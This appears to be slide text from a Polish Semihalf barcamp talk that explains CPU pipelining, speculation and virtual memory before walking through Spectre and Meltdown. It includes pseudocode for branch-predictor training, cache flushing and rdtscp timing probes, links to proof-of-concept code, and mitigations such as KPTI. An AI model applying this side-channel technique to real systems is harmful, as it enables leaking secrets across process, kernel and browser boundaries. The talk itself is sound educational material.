CPU GHOST BUSTING. Semihalf Barcamp Special.

CPU ghost busting
Semihalf
* https://www.gq.com/story/the-best-part-of-the-snowman-is-all-of-these-terrible-advertisements
Odsłaniamy mechanizmy
Meltdown i Spectre.

Plan prezentacji
● CPU od podszewki
○ Pipelining
○ Out-Of-Order
○ Speculation
○ Virtual Memory
● Spectre & Meltdown
● Wektory ataku
● Historia

Central Processing Unit (CPU) — electronic
circuitry that performs basic arithmetic,
logical, control and input/output operations
specified by the instructions.
— Wikipedia
3
Basic - czyli
proste?

Jak wygląda CPU?
4Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/
Czemu tak
dużo?
2 Mld
tranzystorów

Prosty jak CeP...eU*
5
Instruction
Fetch/Decode
Memory
PC
Registers
ALU
WriteExecuteDecode/LoadInstruction Fetch
* To tylko schemat ideowy

Miary szybkości procesora
● 1 cykl CPU = 1 takt zegara
● CPI - cycles per instruction
● IPC - instructions per cycle = 1/CPI
● MIPS - milions instructions per second
6
● szybkość != wydajność

Prosty CPU - 4MHz
7
Cycle 1
Fetch Decode Execute Write
2 3 4 5 6 7 8
mov ...
xor ...
cmp ...
9
Fetch
4Mhz / 4 CPI = 1 MIPS
Jak to zrobić?
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
De
1 CPI ?
Chcemy
szybciej!

Prosty CPU z potokiem (pipeline)
8
InstructionFetch/Decode
Memory
PC
InstructionDecode/Execute
Registers
InstructionExecute/Write
ALU
Czy jest
szybciej?
Pipeline Stages
* Intel i486

Prosty CPU z potokiem (pipeline)
9
Cycle 1
Fetch Decode Execute
2 3 5 6 7 8
Fetch Decode Write
mov ...
xor ...
cmp ...
9
Fetch
Stan CPU w
jednym cyklu
Execute Write
div ... Decode Execute Write
Write
4
Execute
Decode
Fetch
Ile MIPS ?

Prosty CPU z potokiem - 4MHz
10
Cycle 1
2 3 4 5 6 7 8
mov ...
xor ...
cmp ...
9
Fetch
4MHz / 1 CPI = 4 MIPS
Decode Execute Write
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
Jeszcze
szybciej!
Zwiększyć
zegar?

Prosty CPU z potokiem - 8MHz
11
Cycle 1
F D E W
2 3 4 5 6 7 8
mov ...
xor ...
cmp ...
9
8MHz / 1 CPI = 8 MIPS
Jeszcze
szybciej!
F D E W
F D E W
10 11 12 13 14 15 16 17
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...

40MHz ?
12
Cycle
mov ...
xor ...
cmp ...
40MHz / 1 CPI = 40 MIPS ?
Czy to
możliwe?
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...

Zegar to nie wszystko
13
Cycle
mov ...
xor ...
cmp ...
40MHz / 1 CPI = 40 MIPS ?
Source: https://en.wikipedia.org/wiki/Megahertz_myth
Czemu nie?
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...

Rozwój pamięci DRAM
14Source: https://en.wikipedia.org/wiki/CAS_latency (First Word)
Czas dostępu do
DRAM taki sam od
lat 90-tych
Co zrobić?
Jeszcze
szybciej!
...ale DRAM
jest wolny...

CPU z potokiem i cache
15
Memory
PC
Registers
ALU
Jest
szybciej?
Data
Cache
Instr.
Cache
Write
Buffer
* Intel i486
Co się
zmieniło?

divdiv ...
xor ... stall
CPU z potokiem i cache
16
Cycle
mov
xor ...
cmp ...
40MHz / ~4 CPI = ~10 MIPS
stall
Stalls :(Pipeline stall :( Co zrobić?
...ale potok staje
w miejscu...
Jeszcze
szybciej!
cache miss

Procesor superskalarny z cache
17
Memory
PC
Registers
ALU
Jest
szybciej?
Data
Cache
Instr.
Cache
Write
Buffer
* Intel Pentium
Co się
zmieniło?
ALU

stall divdiv ...
xor ... write ordering
Procesor superskalarny z cache
18
Cycle
mov ...
xor ...
cmp ...
40M CPS / ~4 CPI * 1,5 IPC = ~15 MIPS
Czyżby?
cache miss
read ordering Ordering :(
...ale rozkazy
muszą być
po kolei...
Jeszcze
szybciej!

divdiv ...
xor ...
Out of Order
19
Cycle
mov ...
xor ...
cmp ...
Co ze skokami?
cache miss
Odczyt nie
po kolei :(
* Intel Pentium Pro and newer
Zapis nie po
kolei :(
Re-order buffer
zwiększenie przeciętnego IPC

Skoki warunkowe
uint8_t array[ 256];
size_t array_size = 256;
uint8_t bounds_check(size_t idx)
{
if (idx < array_size)
return array[idx];
return 0;
}
20
bounds_check:
xor %eax, %eax
cmp %rdi, array_size(%rip)
jbe .L1
mov array(%rdi), %eax
.L1:
ret
Czy skoki mogą
być nie po kolei?

s
t
a
ll
dependencyjbe ...
mov or
ret?
Skoki warunkowe w OoO CPU
21
Cycle
cmp ... cache miss
Co zrobić?
xor %eax, %eax
jbe .L1
.L1:
ret
xor ...
stall?
...ale nie znamy
warunku...
Jeszcze
szybciej!
PC
PC

s
t
a
ll
dependencyjbe ...
CPU ze spekulacją
22
Cycle
cmp ... cache miss
Co jeśli rezultat jest
inny ?
xor %eax, %eax
jbe .L1
.L1:
ret
xor ...
speculation
cache missmov*
ret* speculation
PC
PC

branch miss penalty
s
t
a
ll
dependencyjbe ...
Branch Miss
23
Cycle
cmp ... cache miss
xor ...
speculation
cache missmov*
ret*
icache missret
Co zrobić?
speculation
Pipeline flush!
...ale branch miss jest
kosztowny...
Jeszcze
szybciej!
PC
miss

Co zrobić przy rozgałęzieniu?
24
xor %eax, %eax
jbe .L1
ret
...
ret
...
1. Lewo
2. Prawo
3. Oba kierunki?!
4. Pomysły?

prediction
jbe ...
Branch Predictor
25
cmp ...
xor ...
mov ...
ret ...
...
Branch History Table
last n-bits of instruction address
2n
elements
...
...
Source: https://en.wikipedia.org/wiki/Branch_predictor
Historia skoków
Y Y Y Y
N
N N N N
Y Y Y Y
Y Y Y Y
Y N Y
N N N N
N N N N
Y Y Y Y

dependencyjbe ...
CPU z predykcją skoków
26
Cycle
cmp ... cache miss
xor %eax, %eax
jbe .L1
.L1:
ret
xor ...
mov*
ret*
Prediction: do not take branch
Wiele rdzeni!
speculationspeculation
cache miss
Jeszcze
szybciej!
PC
PC

Okno spekulacyjne
if (x < array_size)
return (array[x]*777)^7;
return 0; R = RetirePipeline
bubble (stall)Cache miss
Cykl 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
movq array_size, %rdx F D EX EX EX - - - - - - - - W R
xor %eax, %eax F D EX W - - - - - - - - - - R
cmpq %rdi, %rdx F D - - - - - - - - - - EX W R
jbe exit F D - - - - - - - - - - - EX W R
movzq array(%rdi), %rax F D EX EX EX W - - - - - - - - R
imulq $777, %rax, %rax F D - - - EX EX EX W - - - - - - R
xorq $7, %rax F D - - - - - EX W - - - - - R
ret #exit F D EX W - - - - - - - - - - - R

Schemat rdzenia CPU
28Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Instruction Decode Queue (micro-op queue)
Allocate/Rename/Retire/Move Elimination/Zero Idiom
Scheduler
ALU
Vec ALU
Vec Shft
Vec Add
Vec Mul
FMA
DIV
Branch2
ALU
Fast LEA
Vec ALU
Vec Shft
Vec Add
Vec Mul
FMA
Slow Int
Slow LEA
ALU
Fast LEA
Vec ALU
Vec Shuff
LD/STA
LD/STA
STD
STA
32K L1
Data
Cache
256K L2
Cache
32K L1
Instruct.
Cache
MSROM
Decoded
Icache
Legacy Decode Pipeline
Branch Prediction Unit
ALU
SHFT
Branch1
Port 0 Port 1 Port 5 Port 6
P. 2
P. 3
P. 4
P. 7

Fotka prawdziwego CPU
29
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
L3Cache
L3Cache
System
Agent
Memory Controller
InterconnectGPU
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
A
L
U
A
L
U
A
L
U
1
2
1
BPU
A
L
U
L3Cache
L3Cache
CPU
Core
CPU
Core
CPU
Core
CPU
Core
CPU
Core
CPU
Core
Source: https://newsroom.intel.com/press-kits/8th-gen-intel-core/
2 Mld
tranzystorów

Pamięć wirtualna
30
Process 1 arraymain()
Process 2 main()
64 bit virtual address space
Kernel syscall()
Physical Memory
data
Swap
OS tworzy mapę
pamięci
Jak się
komunikować?
CPU (TLB) tłumaczy
Virt=>Phys

Start Kernel Map
Pamięć wirtualna w Linuksie
31
Process 1 array1main()
Process 2 main() Kernel syscall()
Physical Memory
data
Swap
Kernel syscall() data
SYSCALL
data access
Jak chronić dane?

Start Kernel Map
Privilege Level Switch
32
Process array1main() Kernel syscall() data
kernel is able to access process data
Co robi Meltdown?
privilege context switch (SYSCALL)
64 bit virtual address space
process is not able to access kernel data

W tej sekcji skupimy się na opisie ataków Spectre i Meltdown
Pokażemy jak przedstawione zagadnienia łączą się w całość.
Oczekujesz większych detali? - dyskusja po prezentacji.

● Variant 1: bounds check bypass (CVE-2017-5753)
Any cpu with speculative execution
● Variant 2: branch target injection (CVE-2017-5715)
● Variant 3: rogue data cache load (CVE-2017-5754)
Confirmed on Intel and ARM A75
IBM POWER 7+ & 8

uint8_t array1[16];
void victim_function(size_t x) {
if (x < array1_size) {
tmp ^= array1[x];
}
}
1) Model ale brak błędu logicznego w kodzie
2) CPU stara się w 100% wykorzystać pipeline -> spekulacja
3) Czy kod spekulacyjny może wykonać się wcześniej niż warunek?
4) Czy występuje zależność danych?

uint8_t array1[16];
tmp ^=array1[x];
}
cmpq %rdi, array1_size(%rip)
jbe .L1
movb array1(%rdi), %al
xorb %al, temp(%rip)
.L1: ret
1) Brak zależności danych umożliwia “równoległe” wykonanie instrukcji
2) “retire” - Kolejność odroczonego ujawniania efektów wykonania instrukcji
3) NAJWAŻNIEJSZE - skąd procesor WIE że warto wykonać skok?
?

retire
N N N N N T/N?
pipeline flush
pipeline flush
decode
1) CPU zgaduje - wykorzystuje “branch locality”
2) Błędna predykcja = pipeline flush (np x > array1_size)
3) Efekt odwołania poza zakresem NIE jest upubliczniany - rollback
4) “Okno spekulacyjne” - okres czasu na wykonanie spekulacji
5) Jak “trenować” BrPred aby spekulatywnie odwoływać się poza zakresem?
cmpq %rdi, array1_size(%rip)
jbe .L1
movb array1(%rdi), %al
xorb %al, temp(%rip)
.L1: ret
uint8_t array1[16];
tmp ^=array1[x];
}

uint8_t array1[16];
uint8_t array2[256 * 512];
tmp ^= array2[array1[x] * 512]
}
1) Fragment kodu z ataku - dwie tablice adresowane pośrednio
2) Trenowanie BrPred zwiększa szanse na spekulatywnie odwołanie poza zakresem
3) Co nam to daje skoro efekty spekulatywnego wykonania są odrzucane?
4) Jakie są efekty operowania na pamięci z kodu powyżej?
trenuj!

uint8_t array1[16];
uint8_t array2[256 * 512];
void victim_function(x) {
tmp ^= array2[array1[x] * 512];
}
}
invalidate_cache(array2); //make array2 “cold”
victim_function(train_x = 5); //train - call many times
Virtual Memory
array1_size
array1
“cold” memory cached memory
array2
3
2

uint8_t array1[16];
uint8_t array2[256 * 512];
void victim_function(x) {
tmp ^= array2[array1[x] * 512];
}
}
invalidate_cache(array2);
victim_function(train_x = valid_x);
invalidate_cache(&array_size);
victim_function(secret - array1);
Virtual Memory array_size
array1
secret
array2
“otwiera” okno spekulacyjne
dostęp do secret i array2 musi się dokonać przed
“retire” warunku
secret = 60
precached

Virtual Memory
array_size
array1
secret
array2
uint8_t array2[256 * 512];
void measure() {
for (i = 0; i < 256; i++) {
before = rdtscp();
tmp = array2[i * 512];
after = rdtscp();
time[i] = after - before;
}
}
*secret == train_xLLC
L2
L1
quiz
>> cache_line_size?
RAM

Virtual Memory
array_size
array1
secret
array2
for (i = 0; i < 1000; i++) {
train_x = i % array1_size;
malicious_x = secret - array1;
victim_function(train_x);
invalidate_cache(&array_size);
victim_function(malicious_x);
measure();
if (score_filtration(&secret_val))
break;
}
return secret_val;
RAM
LLC
L2
L1różne sposoby

Przedstawione informacje są istotne
do zrozumienia całości zagadnienia.
Niejasne?
Pytania?

if (index < simpleByteArray.length) {
index = simpleByteArray[index | 0];
index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0;
localJunk ^= probeTable[index|0]|0; 5
}
cmpl r15,[rbp-0xe0]
jnc 0x24dd099bb870
REX.W leaq rsi,[r12+rdx*1]
movzxbl rsi,[rsi+r15*1]
shll rsi, 12
andl rsi,0x1ffffff
movzxbl rsi,[rsi+r8*1]
xorl rsi,rdi
REX.W movq rdi,rsi
JIT
● degrade high-resolution timer
● disable HTML5 Web Workers
● strict site isolation
● branch speculation barrier
● index modulo
● Spectre check

Process 2
Proc 1
Attacker
IPC
Proc 2
Victim
Secret
User Process
eBPF bytecode
Kernel
verifier
BPF JIT
kprobes
tracepoints
buffersensitive data
User Process
program
Kernel
Cache
Virtual Memory array_size
array1
secret
array2
VS
Victim VM space
Ignore access bits
params x
sensitive
data
sensitive
data
Web Browser Process
with sandbox JS VM isolation
Page 1
JS JIT
Attacker
Page 2
Victim
Secret Cookie
Secret Password
sensitive
data
KPTI
ta sama maszyna

● Variant 1 (Spectre) Atak typu side-channel w ramach kodu
uruchamianego w przestrzeni adresowej ofiary
● Variant 3 (Meltdown) specyficzny dla µarch. CPU.
Atak typu side-channel na dane w cache z pominięciem
walidacji praw dostępu do pamięci wirtualnej.

128 TB
128 TB
Kernel
Space
User
Space
PCI-e range
SOC range
RAM
Process n page
Process 1 page
Shared page
Kernel page
Process 1 page
DMA page
DMA page
48bit
47bit
0 bit
Virtual Physical memory
Kernel
logical
address
kmalloc()
Kernel
virtual
address
vmalloc()
int fd = open("/proc/version", O_RDONLY);
pread(fd, buf, sizeof(buf), 0);
Mapowanie
wymagane dla:
Trap, IRQ, Syscall
Kernel privileges
cached
tmp ^= array2[array1[x] * 512]
}
User privileges
KPTI
Non trivial - shadow
address spaces
threads,
x86 vector tables

Ale łatki KPTI obniżają
wydajność! Dlaczego?
I czy będę grał w grę?!!!111

Proc 1 memory Kernel memory
Proc 2 memory Kernel memoryProc 2 memory
Context switch
Privilege level switch
Translation lookaside buffer flush
często
okazjonalnie
IRQ
Non KPTI kernel
Context switch
Proc 1 memory Kernel memoryKernel memory
IRQ
KPTI kernel

● Spectre + Meltdown w 99 liniach by Andriy Berestovskyy
https://github.com/Semihalf/spectre-meltdown.git
● Oryginalny PoC z “Spectre paper” z komentarzami
ułatwiającymi zrozumienie detali
https://gist.github.com/semihalf-biernacki-radoslaw/3d5518e
19bebb6cb145ae84e48aa8f2b
Based on "Spectre Attack" by Paul Kocher et al

https://asciinema.org/a/yg9hEO7gohO6EJa6PVz2My3yk

Audyt procesorów
80x86
Raport identyfikuje
mechanizmy, które mogą
doprowadzić do wycieku
informacji.
“The Intel 80x86
Processor Architecture:
Pitfalls for Secure
Systems”
1995
Cache missing for
fun and profit
Autor ukazuje zagrożenia
związane z pamięcią
współdzieloną pomiędzy
wątkami.
“Cache missing for fun
and profit”
2005
Flush + Reload: L3
Cache Side Channel
Autor Yuval Yarom jest
współodkrywcą błędu
Spectre.
“FLUSH + RELOAD: a
High Resolution, Low
Noise, L3 Cache
Side-Channel Attack”
Sierpień 2014
CVE przyznaje
Intelowi numery
błędów
Intel otrzymuje numery:
2017-5715 - wariant 2
2017-5753 - wariant 1
2017-5754 - wariant 3
1 lutego 2017
Publikacja błędów
Meltdown i Spectre
Google przyspiesza
publikację błędów ze
względu na pojawiające
się zewsząd doniesienia
o błędach.
“Reading privileged
memory with a
side-channel”
3 stycznia 2018

Dziękujemy za uwagę.
Z braku czasu pominęliśmy niektóre aspekty:
Variant 2, CPU uCode fix, BTB flush / speculation barrier, retpoline, ASID/PCID, KASLR, Tomasulo's algorithm ...
Chcesz wiedzieć więcej? - pogadajmy przy

CPU GHOST BUSTING. Semihalf Barcamp Special.

Empfohlen

Empfohlen

Weitere ähnliche Inhalte

Ähnlich wie CPU GHOST BUSTING. Semihalf Barcamp Special.

Ähnlich wie CPU GHOST BUSTING. Semihalf Barcamp Special. (20)

Mehr von Semihalf

Mehr von Semihalf (16)

CPU GHOST BUSTING. Semihalf Barcamp Special.